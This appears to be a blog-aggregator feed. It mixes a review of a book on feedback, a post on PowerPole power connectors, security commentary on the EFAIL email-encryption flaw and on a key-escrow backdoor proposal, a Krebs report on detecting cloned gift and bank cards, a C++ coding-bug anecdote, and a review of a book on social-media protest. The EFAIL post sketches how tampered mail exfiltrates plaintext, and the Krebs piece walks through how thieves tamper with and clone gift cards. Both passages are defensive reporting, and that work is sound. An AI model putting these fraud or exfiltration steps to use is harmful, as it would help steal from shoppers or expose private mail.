That framework makes it easier to see where one's reaction to feedback often goes off the rails. If you come into a conversation needing appreciation ("I've been working long hours to get this finished on time, and a little thanks would be nice"), but the other person is focused on an opportunity for coaching ("I can point out a few tricks and improvements that will let you not work as hard next time"), the resulting conversation rarely goes well. The person giving the coaching is baffled at the resistance to some simple advice on how to improve, and may even form a negative opinion of the other person's willingness to learn. And the person receiving the feedback comes away feeling unappreciated and used, and possibly fearful that their hard work is merely a sign of inadequate skills. There are numerous examples of similar mismatches.

I found this framing immediately useful, particularly in the confusion between coaching and evaluation. It's very easy to read any constructive advice as negative evaluation, particularly if one is already emotionally low. Having words to put to these types of feedback makes it easier to evaluate the situation intellectually rather than emotionally, and to explicitly ask for clarifying evaluation if coaching is raising those sorts of worries.

The other memorable concept I took away from this book is switchtracking. This is when the two people in a conversation are having separate arguments simultaneously, usually because each person has a different understanding of what the conversation is "really" about. Often this happens when the initial feedback sets off a trigger, particularly a relationship or identity trigger (other concepts from this book), in the person receiving it. The feedback giver may be trying to give constructive feedback on how to lay out a board presentation, but the receiver is hearing that they can't be trusted to talk to the board on their own. The receiver will tend to switch the conversation away to whether or not they can be trusted, quite likely confusing the initial feedback giver, or possibly even prompting another switchtrack into a third topic of whether they can receive criticism well.

Once you become aware of this tendency, you start to see it all over the place. It's sadly common. The advice in the book, which is accompanied with a lot of concrete examples, is to call this out explicitly, clearly separate and describe the topics, and then pick one to talk about first based on how urgent the topics are to both parties. Some of those conversations may still be difficult, but at least both parties are having the same conversation, rather than talking past each other.

Thanks for the Feedback fleshes out these ideas and a few others (such as individual emotional reaction patterns to criticism and triggers that interfere with one's ability to accept feedback) with a lot of specific scenarios. The examples are refreshingly short and to the point, avoiding a common trap of books like this to get bogged down into extended artificial dialogue. There's a bit of a work focus, since we get a lot of feedback at work, but there's nothing exclusively work-related about the advice here. Many of the examples are from personal relationships of other kinds. (I found an example of a father teaching his daughters to play baseball particularly memorable. One daughter takes this as coaching and the other as evaluation, resulting in drastically different reactions.) The authors combine matter-of-fact structured information with a gentle sense of humor and great pacing, making this surprisingly enjoyable to read.

I was feeling oversaturated with information on conversation styles and approaches and still came away from this book with some useful additional structure. If you're struggling with absorbing feedback or finding the right structure to use it constructively instead of getting angry, scared, or depressed, give this a try. It's much better than I had expected.

Rating: 7 out of 10

,

Planet DebianDaniel Pocock: A closer look at power and PowerPole

The crowdfunding campaign has so far raised enough money to buy a small lead-acid battery but hopefully with another four days to go before OSCAL we can reach the target of an AGM battery. In the interest of transparency, I will shortly publish a summary of the donations.

The campaign has been a great opportunity to publish some information that will hopefully help other people too. In particular, a lot of what I've written about power sources isn't just applicable for ham radio, it can be used for any demo or exhibit involving electronics or electrical parts like motors.

People have also asked various questions and so I've prepared some more details about PowerPoles today to help answer them.

OSCAL organizer urgently looking for an Apple MacBook PSU

In an unfortunate twist of fate while I've been blogging about power sources, one of the OSCAL organizers has a MacBook and the Apple-patented PSU conveniently failed just a few days before OSCAL. It is the 85W MagSafe 2 PSU and it is not easily found in Albania. If anybody can get one to me while I'm in Berlin at Kamailio World then I can take it to Tirana on Wednesday night. If you live near one of the other OSCAL speakers you could also send it with them.

If only Apple used PowerPole...

Why batteries?

The first question many people asked is why use batteries and not a power supply. There are two answers for this: portability and availability. Many hams like to operate their radios away from their home sometimes. At an event, you don't always know in advance whether you will be close to a mains power socket. Taking a battery eliminates that worry. Batteries also provide better availability in times of crisis: whenever there is a natural disaster, ham radio is often the first mode of communication to be re-established. Radio hams can operate their stations independently of the power grid.

Note that while the battery looks a lot like a car battery, it is actually a deep cycle battery, sometimes referred to as a leisure battery. This type of battery is often promoted for use in caravans and boats.

Why PowerPole?

Many amateur radio groups have already standardized on the use of PowerPole in recent years. The reason for having a standard is that people can share power sources or swap equipment around easily, especially in emergencies. The same logic applies when setting up a demo at an event where multiple volunteers might mix and match equipment at a booth.

WICEN, ARES / RACES and RAYNET-UK are some of the well known groups in the world of emergency communications and they all recommend PowerPole.

Sites like eBay and Amazon have many bulk packs of PowerPoles. Some are genuine, some are copies. In the UK, I've previously purchased PowerPole packs and accessories from sites like Torberry and Sotabeams.

The pen is mightier than the sword, but what about the crimper?

The PowerPole plugs for 15A, 30A and 45A are all interchangeable and they can all be crimped with a single tool. The official tool is quite expensive but there are many after-market alternatives like this one. It takes less than a minute to insert the terminal, insert the wire, crimp and make a secure connection.

Here are some packets of PowerPoles in every size:

Example cables

It is easy to make your own cables or to take any existing cables, cut the plugs off one end and put PowerPoles on them.

Here is a cable with banana plugs on one end and PowerPole on the other end. You can buy cables like this or if you already have cables with banana plugs on both ends, you can cut them in half and put PowerPoles on them. This can be a useful patch cable for connecting a desktop power supply to a PowerPole PDU:

Here is the Yaesu E-DC-20 cable used to power many mobile radios. It is designed for about 25A. The exposed copper section simply needs to be trimmed and then inserted into a PowerPole 30:

Many small devices have these round 2.1mm coaxial power sockets. It is easy to find a packet of the pigtails on eBay and attach PowerPoles to them (tip: buy the pack that includes both male and female connections for more versatility). It is essential to check that the devices are all rated for the same voltage: if your battery is 12V and you connect a 5V device, the device will probably be destroyed.

Distributing power between multiple devices

There are a wide range of power distribution units (PDUs) for PowerPole users. Notice that PowerPoles are interchangeable and in some of these devices you can insert power through any of the inputs. Most of these devices have a fuse on every connection for extra security and isolation. Some of the more interesting devices also have a USB charging outlet. The West Mountain Radio RigRunner range includes many permutations. You can find a variety of PDUs from different vendors through an Amazon search or eBay.

In the photo from last week's blog, I have the Fuser-6 distributed by Sotabeams in the UK (below, right). I bought it pre-assembled but you can also make it yourself. I also have a Windcamp 8-port PDU purchased from Amazon (left):

Despite all those fuses on the PDU, it is also highly recommended to insert a fuse in the section of wire coming off the battery terminals or PSU. It is easy to find maxi blade fuse holders on eBay and in some electrical retailers:

Need help crimping your cables?

If you don't want to buy a crimper or you would like somebody to help you, you can bring some of your cables to a hackerspace or ask if anybody from the Debian hams team will bring one to an event to help you.

I'm bringing my own crimper and some PowerPoles to OSCAL this weekend, if you would like to help us power up the demo there please consider contributing to the crowdfunding campaign.

CryptogramDetails on a New PGP Vulnerability

A new PGP vulnerability was announced today. Basically, the vulnerability makes use of the fact that modern e-mail programs allow for embedded HTML objects. Essentially, if an attacker can intercept and modify a message in transit, he can insert code that sends the plaintext in a URL to a remote website. Very clever.

The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.

The attacker changes an encrypted email in a particular way and sends this changed encrypted email to the victim. The victim's email client decrypts the email and loads any external content, thus exfiltrating the plaintext to the attacker.
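
As a rough illustration of that mechanism (a toy sketch, not code from the EFAIL paper; the attacker URL and the stand-in decrypt function are invented), the direct-exfiltration variant boils down to an attacker-supplied image tag wrapped around the encrypted part:

#include <iostream>
#include <string>

// Stand-in for the real OpenPGP/S-MIME decryption done by the mail client.
std::string decrypt(const std::string& ciphertext) {
    return "meet at noon";
}

int main() {
    // Attacker-controlled HTML wrapped around the intercepted encrypted part.
    std::string attacker_prefix = "<img src=\"http://attacker.example/";
    std::string attacker_suffix = "\">";
    std::string ciphertext = "...intercepted PGP message...";
    // A vulnerable client decrypts the part and splices the plaintext into the
    // HTML body before rendering, so the plaintext ends up inside the image URL.
    std::string rendered = attacker_prefix + decrypt(ciphertext) + attacker_suffix;
    std::cout << rendered << "\n";
    // Rendering that tag makes the client request the URL, and the plaintext
    // travels to the attacker's server as part of the request.
}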

A few initial comments:

1. Being able to intercept and modify e-mails in transit is the sort of thing the NSA can do, but is hard for the average hacker. That being said, there are circumstances where someone can modify e-mails. I don't mean to minimize the seriousness of this attack, but that is a consideration.

2. The vulnerability isn't with PGP or S/MIME itself, but in the way they interact with modern e-mail programs. You can see this in the two suggested short-term mitigations: "No decryption in the e-mail client," and "disable HTML rendering."

3. I've been getting some weird press calls from reporters wanting to know if this demonstrates that e-mail encryption is impossible. No, this just demonstrates that programmers are human and vulnerabilities are inevitable. PGP almost certainly has fewer bugs than your average piece of software, but it's not bug free.

4. Why is anyone using encrypted e-mail anymore, anyway? Reliably and easily encrypting e-mail is an insurmountably hard problem for reasons having nothing to do with today's announcement. If you need to communicate securely, use Signal. If having Signal on your phone will arouse suspicion, use WhatsApp.

I'll post other commentaries and analyses as I find them.

EDITED TO ADD (5/14): News articles.

Slashdot thread.

Cory DoctorowPodcast: Petard, Part 02

Here’s the second part of my reading (MP3) of Petard (part one), a story from MIT Tech Review’s Twelve Tomorrows, edited by Bruce Sterling; a story inspired by, and dedicated to, Aaron Swartz — about elves, Net Neutrality, dorms and the collective action problem.

MP3

Krebs on SecurityDetecting Cloned Cards at the ATM, Register

Much of the fraud involving counterfeit credit, ATM debit and retail gift cards relies on the ability of thieves to use cheap, widely available hardware to encode stolen data onto any card’s magnetic stripe. But new research suggests retailers and ATM operators could reliably detect counterfeit cards using a simple technology that flags cards which appear to have been altered by such tools.

A gift card purchased at retail with an unmasked PIN hidden behind a paper sleeve. Such PINs can be easily copied by an adversary, who waits until the card is purchased to steal the card’s funds. Image: University of Florida.

Researchers at the University of Florida found that account data encoded on legitimate cards is invariably written using quality-controlled, automated facilities that tend to imprint the information in uniform, consistent patterns.

Cloned cards, however, usually are created by hand with inexpensive encoding machines, and as a result feature far more variance or “jitter” in the placement of digital bits on the card’s stripe.
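
The basic signal is simple enough to caricature in a few lines. The sketch below is only a toy restatement of the idea (a variance check on the spacing of bit transitions, with an invented threshold and made-up sample data), not the University of Florida team's actual algorithm:

#include <cmath>
#include <iostream>
#include <vector>

// Toy illustration only: flag a stripe read as suspect when the spacing
// between successive bit transitions varies too much ("jitter"). The input
// format and the threshold are assumptions made for this example.
bool looks_cloned(const std::vector<double>& transition_positions,
                  double max_coefficient_of_variation = 0.05)
{
    if (transition_positions.size() < 3)
        return false;  // not enough data to judge
    std::vector<double> gaps;
    for (std::size_t i = 1; i < transition_positions.size(); ++i)
        gaps.push_back(transition_positions[i] - transition_positions[i - 1]);
    double mean = 0.0;
    for (double g : gaps) mean += g;
    mean /= gaps.size();
    double variance = 0.0;
    for (double g : gaps) variance += (g - mean) * (g - mean);
    variance /= gaps.size();
    double cv = std::sqrt(variance) / mean;  // relative spread of bit spacing
    return cv > max_coefficient_of_variation;
}

int main()
{
    std::vector<double> factory_card = {0.0, 1.0, 2.01, 3.0, 3.99, 5.0};
    std::vector<double> hand_encoded = {0.0, 0.8, 2.3, 2.9, 4.4, 5.0};
    std::cout << std::boolalpha
              << "factory card suspect: " << looks_cloned(factory_card) << "\n"
              << "hand-encoded suspect: " << looks_cloned(hand_encoded) << "\n";
}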

Gift cards can be extremely profitable and brand-building for retailers, but gift card fraud creates a very negative shopping experience for consumers and a costly conundrum for retailers. The FBI estimates that gift card fraud makes up a small percentage of overall gift card sales and use; approximately $130 billion worth of gift cards are sold each year.

One of the most common forms of gift card fraud involves thieves tampering with cards inside the retailer’s store — before the cards are purchased by legitimate customers. Using a handheld card reader, crooks will swipe the stripe to record the card’s serial number and other data needed to duplicate the card.

If there is a PIN on the gift card packaging, the thieves record that as well. In many cases, the PIN is obscured by a scratch-off decal, but gift card thieves can easily scratch those off and then replace the material with identical or similar decals that are sold very cheaply by the roll online.

“They can buy big rolls of that online for almost nothing,” said Patrick Traynor, an associate professor of computer science at the University of Florida. “Retailers we’ve worked with have told us they’ve gone to their gift card racks and found tons of this scratch-off stuff on the ground near the racks.”

At this point the cards are still worthless because they haven’t yet been activated. But armed with the card’s serial number and PIN, thieves can simply monitor the gift card account at the retailer’s online portal and wait until the cards are paid for and activated at the checkout register by an unwitting shopper.

Once a card is activated, thieves can encode that card’s data onto any card with a magnetic stripe and use that counterfeit to purchase merchandise at the retailer. The stolen goods typically are then sold online or on the street. Meanwhile, the person who bought the card (or the person who received it as a gift) finds the card is drained of funds when they eventually get around to using it at a retail store.

The top two gift cards show signs that someone previously peeled back the protective sticker covering the redemption code. Image: Flint Gatrell.

Traynor and a team of five other University of Florida researchers partnered with retail giant WalMart to test their technology, which Traynor said can be easily and quite cheaply incorporated into point-of-sale systems at retail store cash registers. They said the WalMart trial demonstrated that the researchers’ technology distinguished legitimate gift cards from clones with up to 99.3 percent accuracy.

While impressive, that rate means the technology could still generate a “false positive” — erroneously flagging a legitimate customer as using a fraudulently obtained gift card in a non-trivial number of cases. But Traynor said the retailers they spoke with in testing their equipment all indicated they would welcome any additional tools to curb the incidence of gift card fraud.

“We’ve talked with quite a few retail loss prevention folks,” he said. “Most said even if they can simply flag the transaction and make a note of the person [presenting the cloned card] that this would be a win for them. Often, putting someone on notice that loss prevention is watching is enough to make them stop — at least at that store. From our discussions with a few big-box retailers, this kind of fraud is probably their newest big concern, although they don’t talk much about it publicly. If the attacker does any better than simply cloning the card to a blank white card, they’re pretty much powerless to stop the attack, and that’s a pretty consistent story behind closed doors.”

BEYOND GIFT CARDS

Traynor said the University of Florida team’s method works even more accurately in detecting counterfeit ATM and credit cards, thanks to the dramatic difference in jitter between bank-issued cards and those cloned by thieves.

The magnetic material on most gift cards bears a quality that’s known in the industry as “low coercivity.” The stripe on so-called “LoCo” cards is usually brown in color, and new data can be imprinted on them quite cheaply using a machine that emits a relatively low or weak magnetic field. Hotel room keys also rely on LoCo stripes, which is why they tend to so easily lose their charge (particularly when placed next to something else with a magnetic charge).

In contrast, “high coercivity” (HiCo) stripes like those found on bank-issued debit and credit cards are usually black in color, hold their charge much longer, and are far more durable than LoCo cards. The downside of HiCo cards is that they are more expensive to produce, often relying on complex machinery and sophisticated manufacturing processes that encode the account data in highly uniform patterns.

These graphics illustrate the difference between original and cloned cards. Source: University of Florida.

Traynor said tests indicate their technology can detect cloned bank cards with virtually zero false-positives. In fact, when the University of Florida team first began seeing positive results from their method, they originally pitched the technique as a way for banks to cut losses from ATM skimming and other forms of credit and debit card fraud.

Yet, Traynor said fellow academicians who reviewed their draft paper told them that banks probably wouldn’t invest in the technology because most financial institutions are counting on newer, more sophisticated chip-based (EMV) cards to eventually reduce counterfeit fraud losses.

“The original pitch on the paper was actually focused on credit cards, but academic reviewers were having trouble getting past EMV — as in, ‘EMV solves this and it’s universally deployed – so why is this necessary?’” Traynor said. “We just kept getting reviews back from other academics saying that credit and bank card fraud is a solved problem.”

The trouble is that virtually all chip cards still store account data in plain text on the magnetic stripe on the back of the card — mainly so that the cards can be used in ATM and retail locations that are not yet equipped to read chip-based cards. As a result, even European countries whose ATMs all require chip-based cards remain heavily targeted by skimming gangs because the data on the chip card’s magnetic stripe can still be copied by a skimmer and used by thieves in the United States.

The University of Florida researchers recently were featured in an Associated Press story about an anti-skimming technology they developed and dubbed the “Skim Reaper.” The device, which can be made cheaply using a 3D printer, fits into the mouth of an ATM’s card acceptance slot and can detect the presence of extra card reading devices that skimmer thieves may have fitted on top of or inside the cash machine.

The AP story quoted a New York Police Department financial crimes detective saying the Skim Reapers worked remarkably well in detecting the presence of ATM skimmers. But Traynor said many ATM operators and owners are simply uninterested in paying to upgrade their machines with their technology — in large part because the losses from ATM card counterfeiting are mostly assumed by consumers and financial institutions.

“We found this when we were talking around with the cops in New York City, that the incentive of an ATM bodega owner to upgrade an ATM is very low,” Traynor said. “Why should they go to that expense? Upgrades required to make these machines [chip-card compliant] are significant in cost, and the motivation is not necessarily there.”

Retailers also could choose to produce gift cards with embedded EMV chips that make the cards more expensive and difficult to counterfeit. But doing so likely would increase the cost of manufacturing by $2 to $3 per card, Traynor said.

“Putting a chip on the card dramatically increases the cost, so a $10 gift card might then have a $3 price added,” he said. “And you can imagine the reaction a customer might have when asked to pay $13 for a gift card that has a $10 face value.”

A copy of the University of Florida’s research paper is available here (PDF).

The FBI has compiled a list of recommendations for reducing the likelihood of being victimized by gift card fraud. For starters, when buying in-store don’t just pick cards right off the rack. Look for ones that are sealed in packaging or stored securely behind the checkout counter. Also check the scratch-off area on the back to look for any evidence of tampering.

Here are some other tips from the FBI:

-If possible, only buy cards online directly from the store or restaurant.
-If buying from a secondary gift card market website, check reviews and only buy from or sell to reputable dealers.
-Check the gift card balance before and after purchasing the card to verify the correct balance on the card.
-The re-seller of a gift card is responsible for ensuring the correct balance is on the gift card, not the merchant whose name is listed. If you are scammed, some merchants in some situations will replace the funds. Ask for, but don’t expect, help.
-When selling a gift card through an online marketplace, do not provide the buyer with the card’s PIN until the transaction is complete.
-When purchasing gift cards online, be leery of auction sites selling gift cards at a steep discount or in bulk.

CryptogramCritical PGP Vulnerability

EFF is reporting that a critical vulnerability has been discovered in PGP and S/MIME. No details have been published yet, but one of the researchers wrote:

We'll publish critical vulnerabilities in PGP/GPG and S/MIME email encryption on 2018-05-15 07:00 UTC. They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past. There are currently no reliable fixes for the vulnerability. If you use PGP/GPG or S/MIME for very sensitive communication, you should disable it in your email client for now.

This sounds like a protocol vulnerability, but we'll learn more tomorrow.

News articles.

Planet DebianOlivier Berger: Implementing an example Todo-Backend REST API with Symfony 4 and api-platform

Todo-Backend lists many implementations of the same REST API with different backend-oriented Web development frameworks.

I’ve proposed my own version using Symfony 4 in PHP, and the api-platform project which helps implementing REST APIs.

I’ve documented the way I did it in the project’s documentation in detail, for those curious about Symfony development of a very simple REST API (JSON based). See its README file (written, of course, with the mandatory org-mode ;).

You can find the rest of the code here: https://gitlab.com/olberger/todobackend-symfony4.

AFAICS api-platform offers a great set of features for Linked-Data/REST development with Symfony in general. However, some tweaks were necessary to conform to the TodoBackend specs, mainly because TodoBackend is JSON only and doesn’t support JSON-LD…

Oh, and the hardest part was deploying on Heroku, making sure that the CORS headers would work as expected :-/

CryptogramRay Ozzie's Encryption Backdoor

Last month, Wired published a long article about Ray Ozzie and his supposed new scheme for adding a backdoor in encrypted devices. It's a weird article. It paints Ozzie's proposal as something that "attains the impossible" and "satisfies both law enforcement and privacy purists," when (1) it's barely a proposal, and (2) it's essentially the same key escrow scheme we've been hearing about for decades.

Basically, each device has a unique public/private key pair and a secure processor. The public key goes into the processor and the device, and is used to encrypt whatever user key encrypts the data. The private key is stored in a secure database, available to law enforcement on demand. The only other trick is that for law enforcement to use that key, they have to put the device in some sort of irreversible recovery mode, which means it can never be used again. That's basically it.
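
As a rough mental model of that flow (a toy sketch of the scheme as described above, not Ozzie's actual design; every name and "key" here is a placeholder string, with no real cryptography), it amounts to something like this:

#include <iostream>
#include <map>
#include <stdexcept>
#include <string>

// Toy model of the escrow flow described above. A real design would involve
// actual key pairs, a secure coprocessor, and an HSM-backed vendor database.
struct Device {
    std::string id;
    std::string public_key;  // baked into the secure processor at manufacture
    bool bricked;            // set when the irreversible recovery mode is used
};

std::map<std::string, std::string> escrow_db;  // vendor-held: device id -> private key

Device provision_device(const std::string& id) {
    std::string pub = "pub-" + id;   // stand-in for generating a real key pair
    std::string priv = "priv-" + id;
    escrow_db[id] = priv;            // the vendor keeps the private half
    return Device{id, pub, false};
}

std::string law_enforcement_unlock(Device& d) {
    d.bricked = true;  // using the escrowed key permanently disables the device
    auto it = escrow_db.find(d.id);
    if (it == escrow_db.end())
        throw std::runtime_error("no escrowed key for device " + d.id);
    return it->second;
}

int main() {
    Device phone = provision_device("phone-123");
    std::string key = law_enforcement_unlock(phone);
    std::cout << "recovered " << key << ", device bricked: " << phone.bricked << "\n";
}

Even as a toy, the sketch shows where the weight falls: everything depends on escrow_db never being stolen or abused, which is precisely the part of the problem nobody knows how to solve.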

I have no idea why anyone is talking as if this were anything new. Several cryptographers have already explained why this key escrow scheme is no better than any other key escrow scheme. The short answer is (1) we won't be able to secure that database of backdoor keys, (2) we don't know how to build the secure coprocessor the scheme requires, and (3) it solves none of the policy problems around the whole system. This is the typical mistake non-cryptographers make when they approach this problem: they think that the hard part is the cryptography to create the backdoor. That's actually the easy part. The hard part is ensuring that it's only used by the good guys, and there's nothing in Ozzie's proposal that addresses any of that.

I worry that this kind of thing is damaging in the long run. There should be some rule that any backdoor or key escrow proposal be a fully specified proposal, not just some cryptography and hand-waving notions about how it will be used in practice. And before it is analyzed and debated, it should have to satisfy some sort of basic security analysis. Otherwise, we'll be swatting pseudo-proposals like this one, while those on the other side of this debate become increasingly convinced that it's possible to design one of these things securely.

Already people are using the National Academies report on backdoors for law enforcement as evidence that engineers are developing workable and secure backdoors. Writing in Lawfare, Alan Z. Rozenshtein claims that the report -- and a related New York Times story -- "undermine the argument that secure third-party access systems are so implausible that it's not even worth trying to develop them." Susan Landau effectively corrects this misconception, but the damage is done.

Here's the thing: it's not hard to design and build a backdoor. What's hard is building the systems -- both technical and procedural -- around them. Here's Rob Graham:

He's only solving the part we already know how to solve. He's deliberately ignoring the stuff we don't know how to solve. We know how to make backdoors, we just don't know how to secure them.

A bunch of us cryptographers have already explained why we don't think this sort of thing will work in the foreseeable future. We write:

Exceptional access would force Internet system developers to reverse "forward secrecy" design practices that seek to minimize the impact on user privacy when systems are breached. The complexity of today's Internet environment, with millions of apps and globally connected services, means that new law enforcement requirements are likely to introduce unanticipated, hard to detect security flaws. Beyond these and other technical vulnerabilities, the prospect of globally deployed exceptional access systems raises difficult problems about how such an environment would be governed and how to ensure that such systems would respect human rights and the rule of law.

Finally, Matthew Green:

The reason so few of us are willing to bet on massive-scale key escrow systems is that we've thought about it and we don't think it will work. We've looked at the threat model, the usage model, and the quality of hardware and software that exists today. Our informed opinion is that there's no detection system for key theft, there's no renewability system, HSMs are terrifically vulnerable (and the companies largely staffed with ex-intelligence employees), and insiders can be suborned. We're not going to put the data of a few billion people on the line in an environment where we believe with high probability that the system will fail.

EDITED TO ADD (5/14): An analysis of the proposal.

Worse Than FailureCodeSOD: CONDITION_FAILURE

Oliver Smith sends this representative line:

bool long_name_that_maybe_distracted_someone()
{
  return (execute() ? CONDITION_SUCCESS : CONDITION_FAILURE);
}

Now, we’ve established my feelings on the if (condition) { return true; } else { return false; } pattern. This is just an iteration on that theme, using a ternary, right?

That’s certainly what it looks like. But Oliver was tracking down an unusual corner-case bug and things just weren’t working correctly. As it turns out, CONDITION_SUCCESS and CONDITION_FAILURE were both defined in the StatusCodes enum.

Screenshot of the intellisense which shows CONDITION_FAILURE defined as 2

Yep- CONDITION_FAILURE is defined as 2. The method returns a bool. Guess what happens when you coerce a non-zero integer into a boolean in C++? It turns into true. This method only ever returns true. Ironically, the calling method would then do its own check against the return value, looking to see if it were CONDITION_SUCCESS or CONDITION_FAILURE.
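
If you want to see the coercion for yourself, here is a minimal stand-alone snippet. The enum values are assumptions based on the screenshot (CONDITION_FAILURE is shown as 2; the value of CONDITION_SUCCESS is a guess), and the function name is shortened:

#include <iostream>

// Hypothetical reconstruction of the enum from the article's screenshot.
enum StatusCodes { CONDITION_SUCCESS = 1, CONDITION_FAILURE = 2 };

bool check(bool execute_result)
{
    // Same shape as the offending function: whichever branch is taken,
    // a non-zero enum value is implicitly converted to bool.
    return (execute_result ? CONDITION_SUCCESS : CONDITION_FAILURE);
}

int main()
{
    std::cout << std::boolalpha
              << check(true) << "\n"    // true
              << check(false) << "\n";  // also true, because 2 != 0
}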

Planet Linux AustraliaClinton Roy: Actively looking for work

I am now actively looking for work, ideally something with Unix/C/Python in the research/open source/not-for-profit space. My long out-of-date resume has been updated.

Planet DebianRuss Allbery: Review: Twitter and Tear Gas

Review: Twitter and Tear Gas, by Zeynep Tufekci

Publisher: Yale University Press
Copyright: 2017
ISBN: 0-300-21512-6
Format: Kindle
Pages: 312

Subtitled The Power and Fragility of Networked Protest, Twitter and Tear Gas is a close look at the effect of social media (particularly, but not exclusively, Twitter and Facebook) on protest movements around the world. Tufekci pays significant attention to the Tahrir Square protests in Egypt, the Gezi Park protests in Turkey, Occupy Wall Street and the Tea Party in the United States, Black Lives Matter also in the United States, and the Zapatista uprising in Mexico early in the Internet era, as well as more glancing attention to multiple other protest movements since the advent of the Internet. She avoids both extremes of dismissal of largely on-line movements and the hailing of social media as a new era of mass power, instead taking a detailed political and sociological look at how protest movements organized and fueled via social media differ in both strengths and weaknesses from the movements that came before.

This is the kind of book that could be dense and technical but isn't. Tufekci's approach is analytical but not dry or disengaged. She wants to know why some protests work and others fail, what the governance and communication mechanisms of protest movements say about their robustness and capabilities, and how social media has changed the tools and landscape used by protest movements. She's also been directly involved: she's visited the Zapatistas, grew up in Istanbul and is directly familiar with the politics of the Gezi Park protests, and includes in this book a memorable story of being caught in the Antalya airport in Turkey during the 2016 attempted coup. There are some drier and more technical chapters where she's laying the foundations of terminology and analysis, but they just add rigor to an engaging, thoughtful examination of what a protest is and why it works or doesn't work.

My favorite part of this book, by far, was the intellectual structure it gave me for understanding the effectiveness of a protest. That's something about which media coverage tends to be murky, at least in situations short of a full-blown revolutionary uprising (which are incredibly rare). The goal of a protest is to force a change, and clearly sometimes this works. (The US Civil Rights movement and the Indian independence movement are obvious examples. The Arab Spring is a more recent if more mixed example.) However, sometimes it doesn't; Tufekci's example is the protests against the Iraq War. Why?

A key concept of this book is that protests signal capacity, particularly in democracies. That can be capacity to shape a social narrative and spread a point of view, capacity to disrupt the regular operations of a system of authority, or capacity to force institutional change through the ballot box or other political process. Often, protests succeed to the degree that they signal capacity sufficient to scare those currently in power into compromising or acquiescing to the demands of the protest movement. Large numbers of people in the streets matter, but not usually as a show of force. Violent uprisings are rare and generally undesirable for everyone. Rather, they matter because they demand and hold media attention (allowing them to spread a point of view), can shut down normal business and force an institutional response, and because they represent people who can exert political power or be tapped by political rivals.

This highlights one of the key differences between protest in the modern age and protest in a pre-Internet age. The March on Washington at the height of the Civil Rights movement was an impressive demonstration of capacity largely because of the underlying organization required to pull off a large and successful protest in that era. Behind the scenes were impressive logistical and governance capabilities. The same organizational structure that created the March could register people to vote, hold politicians accountable, demand media attention, and take significant and effective economic action. And the government knew it.

One thing that social media does is make organizing large protests far easier. It allows self-organizing, with viral scale, which can create numerically large movements far easier than the dedicated organizational work required prior to the Internet. This makes protest movements more dynamic and more responsive to events, but it also calls into question how much sustained capacity the movement has. The government non-reaction to the anti-war protests in the run-up to the Iraq War was an arguably correct estimation of the signaled capacity: a bet that the anti-war sentiment would not turn into sustained institutional pressure because large-scale street protests no longer indicated the same underlying strength.

Signaling capacity is not, of course, the only purpose of protests. Tufekci also spends a good deal of time discussing the sense of empowerment that protests can create. There is a real sense in which protests are for the protesters, entirely apart from whether the protest itself forces changes to government policies. One of the strongest tools of institutional powers is to make each individual dissenter feel isolated and unimportant, to feel powerless. Meeting, particularly in person, with hundreds of other people who share the same views can break that illusion of isolation and give people the enthusiasm and sense of power to do something about their beliefs. This, however, only becomes successful if the protesters then take further actions, and successful movements have to provide some mechanism to guide and unify that action and retain that momentum.

Tufekci also provides a fascinating analysis of the evolution of government responses to mass protests. The first reaction was media blackouts and repression, often by violence. Although we still see some of that, particularly against out groups, it's a risky and ham-handed strategy that dramatically backfired for both the US Civil Rights movement (due to an independent press that became willing to publish pictures of the violence) and the Arab Spring (due to social media providing easy bypass of government censorship attempts). Governments do learn, however, and have become increasingly adept at taking advantage of the structural flaws of social media. Censorship doesn't work; there are too many ways to get a message out. But social media has very little natural defense against information glut, and the people who benefit from the status quo have caught on.

Flooding social media forums with government propaganda or even just random conspiratorial nonsense is startlingly effective. The same lack of institutional gatekeepers that destroys the effectiveness of central censorship also means there are few trusted ways to determine what is true and what is fake on social media. Governments and other institutional powers don't need to convince people of their point of view. All they need to do is create enough chaos and disinformation that people give up on the concept of objective truth, until they become too demoralized to try to weed through the nonsense and find verifiable and actionable information. Existing power structures by definition benefit from apathy, disengagement, delay, and confusion, since they continue to rule by default.

Tufekci's approach throughout is to look at social media as a change and a new tool, which is neither inherently good nor bad but which significantly changes the landscape of political discourse. In her presentation (and she largely convinced me in this book), the social media companies, despite controlling the algorithms and platform, don't particularly understand or control the effects of their creation except in some very narrow and profit-focused ways. The battlegrounds of "fake news," political censorship, abuse, and terrorist content are murky swamps less out of deliberate intent and more because companies have built a platform they have no idea how to manage. They've largely supplanted more traditional political spheres and locally-run social media with huge international platforms, are now faced with policing the use of those platforms, and are way out of their depth.

One specific example vividly illustrates this and will stick with me. Facebook is now one of the centers of political conversation in Turkey, as it is in many parts of the world. Turkey has a long history of sharp political divisions, occasional coups, and a long-standing, simmering conflict between the Turkish government and the Kurds, a political and ethnic minority in southeastern Turkey. The Turkish government classifies various Kurdish groups as terrorist organizations. Those groups unsurprisingly disagree. The arguments over this inside Turkey are vast and multifaceted.

Facebook has gotten deeply involved in this conflict by providing a platform for political arguments, and is now in the position of having to enforce their terms of service against alleged terrorist content (or even simple abuse), in a language that Facebook engineers largely don't speak and in a political context that they largely know nothing about. They of course hire Turkish speakers to try to understand that content to process abuse reports. But, as Tufekci (a Turkish native) argues, a Turkish speaker who has the money, education, and family background to be working in an EU Facebook office in a location like Dublin is not randomly chosen from the spectrum of Turkish politics. They are more likely to have connections to or at least sympathies for the Turkish government or business elites than to be related to a family of poor and politically ostracized Kurds. It's therefore inevitable that bias will be seen in Facebook's abuse report handling, even if Facebook management intends to stay neutral.

For Turkey, you can substitute just about any other country about which US engineers tend to know little. (Speaking as a US native, that's a very long list.) You may even be able to substitute the US for Turkey in some situations, given that social media companies tend to outsource the bulk of the work to countries that can provide low-paid workers willing to do the awful job of wading through the worst of humanity and attempting to apply confusing and vague terms of service. Much of Facebook's content moderation is done in the Philippines, by people who may or may not understand the cultural nuances of US political fights (and, regardless, are rarely given enough time to do more than cursorily glance at each report).

